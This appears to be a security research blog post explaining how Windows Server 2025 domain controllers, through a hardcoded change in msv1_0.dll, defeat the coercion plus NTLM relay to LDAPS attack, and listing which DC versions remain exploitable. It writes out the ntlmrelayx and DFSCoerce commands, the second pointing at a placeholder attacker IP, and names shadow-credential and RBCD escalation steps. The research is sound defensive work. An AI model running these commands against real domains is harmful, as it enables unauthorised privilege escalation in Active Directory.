The article explains a subtle but impactful security change introduced in Windows Server 2025 Domain Controllers that silently disrupts a well-known NTLM relay attack technique used in Active Directory environments. Historically, attackers could combine coercion attacks with NTLM relay to LDAPS by exploiting environments where LmCompatibilityLevel allowed NTLMv1 with Extended Session Security (ESS). In this scenario, attackers could manipulate the NTLM handshake and strip the Message Integrity Code (MIC), enabling authentication relays across domain controllers. The author discovered that this attack chain no longer works when the target DC runs Windows Server 2025. Unlike previous mitigations that relied on policies or configuration changes, this protection is implemented directly in the authentication code inside msv1_0.dll. The change effectively blocks the legacy behavior required for generating NTLMv1 responses in this context, preventing the attacker from abusing the MIC-stripping technique. As a result, the traditional cross-DC coercion + NTLM relay to LDAPS attack path is effectively dead against Server 2025 domain controllers, marking an important hardening step in Microsoft’s gradual move away from NTLM toward more secure authentication mechanisms.
TL;DR
This post is super short, nevertheless:
The classic cross-DC coerce + relay to LDAPS technique, abusing a misconfigured LmCompatibilityLevel (0/1/2) to generate NTLMv1 + ESS and strip the MIC, is dead when the victim DC runs Windows Server 2025.
And it’s not just a policy change.
It’s hardcoded in msv1_0.dll.
DISCLAIMER
I’m not 100% sure nobody has already published or blogged about this specific finding. I did some research and couldn’t find anything covering this topic, but if someone has already documented this , kudos to them , and sorry for the duplication. I’m sharing it because I think it’s useful and I haven’t seen it written up this way anywhere.
THE CLASSIC ATTACK
If you’ve done Active Directory pentesting or red teaming in the last few years, you probably know this one by heart.
Scenario:
We have at least two domain controllers. One of them, DC2, has LmCompatibilityLevel misconfigured (< 3).
That gives us an opening.
We can run:
ntlmrelayx.py -t ldaps://DC1 -smb2support --shadow-credentials --remove-micThen coerce DC2 to authenticate to us:
DFSCoerce.py -u <user> -p <pass> -d <domain> DC2 ATTACKER_IPDC2 is coerced into authenticating to our attacker machine.
An NTLMv1 + ESS AUTHENTICATE message hits our ntlmrelayx.
We strip the MIC using --remove-mic, relay it to DC1 over LDAPS, and modify sensitive attributes on DC2’s computer object:
- Write
msDS-KeyCredentialLink(Shadow Credentials) - Add RBCD
- Or any other relay-based privilege escalation
Game over.
This worked reliably when the coerced Domain Controller versions was <= 2022
It does not work when the coerced Domain Controller is 2025:
Let me explain, based on my analysis, why, at the code level.
WHAT CHANGED IN SERVER 2025
Diffing msv1_0.dll between Server 2022 and Server 2025 (thanks also to Claude ) reveals an interesting change to kill this attack.
- Fixed level in
NtLmGlobalLmProtocolSupported
In MspLm20GetChallengeResponse, the code that determines what type of authentication response to generate, Server 2025 added this:
This means if you had LmCompatibilityLevel=0 or 1 or 2 in the registry on a 2025 DC, it would still generate NTLMv2:
Note that in case of an NTLMv1 response, the size is fixed to 24.
What does this mean?
A Win2025 machine will never generate NTLMv1 as a client, regardles of the LmCompatibilityLevel configured in registry.
Also notable: the default value of NtLmGlobalLmProtocolSupported changed from 3 in 2022 to 4 in 2025.
This hopefully should explain why this relay attack stopped workig in 2025 (at least starting from 2024-09 Cumulative Update for Windows 11 Version 24H2 for arm64-based Systems (KB5043080) )
In Server 2022 the registry value was used directly.
THE SURVIVING ATTACK SURFACE
The table summarizes the exploitable attack surface based on the Server versions:
| DC Victim | DC Target | Victim LmCompatibilityLevel | LDAPS Chanel Binding |
| Server version <=2022 | Server version <=2022 | 0,1,2 | NOT required |
| Server version <=2022 | Server Version 2025 | 0,1,2 | NOT required |
The –remove-mic with NTLMv1+ESS still works across all versions.
But hey, we’re all abandoning NTLM very soon anyway.
At least that’s what Microsoft keeps telling us.
So who cares?
That’s all